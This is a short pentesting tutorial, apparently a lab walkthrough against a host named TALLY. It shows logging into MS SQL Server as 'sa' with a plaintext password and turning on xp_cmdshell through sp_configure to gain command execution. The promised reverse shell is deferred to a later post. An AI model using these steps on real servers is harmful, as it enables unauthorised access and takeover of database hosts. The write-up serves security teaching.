Finaly i am back with pentesting tutorial after few weeks discussing about reverse engineering (assembly).
Usually after you get access to the database server, you will think what move that I could take for the next step. I would like to discuss about how do you create a reverse shell from an MS SQL server.
First you should ensure that the MSSQL is up and running using nmap
we can see that port 1433 is open
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2016 13.00.1601.00; RTM | ms-sql-ntlm-info: | Target_Name: TALLY | NetBIOS_Domain_Name: TALLY | NetBIOS_Computer_Name: TALLY | DNS_Domain_Name: TALLY | DNS_Computer_Name: TALLY |_ Product_Version: 10.0.14393 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-01-30T21:51:35 | Not valid after: 2050-01-30T21:51:35 | MD5: 8c4b 425d cfa5 28d4 ea66 30c0 3cbc 525c | SHA-1: bb46 babd 9897 0f84 7fa7 b56e df63 392a 2040 21e4
OK.. I will skip how did I find the user name and password to the database. Lets jump in to the shell creation
You can connect to the MSSQL using the command below
sqsh -S 10.10.10.56 -U sa -P GWE3V65#6KFH93@4GWTG2G
After we connect to the database using the above command, we need to check if we can execute command shell using xp_cmdshell. lets try to execute below
xp_cmdshell 'whoami' go Msg 15281, Level 16, State 1 Server 'TALLY', Procedure 'xp_cmdshell', Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
if the output like the above then you need to activate the cmdshell feature with below command
1> EXEC SP_CONFIGURE 'show advanced options',1 2> reconfigure 3> go Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0) 1> EXEC SP_CONFIGURE 'xp_cmdshell',1 2> reconfigure 3> go Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0)
With the above command we have configured that our SQL Server is able to execute command at the server.
OK, That is all.. I will continue in the next post on how to do the reverse shell creation with nishang powershell by using the xp_cmdshell functionality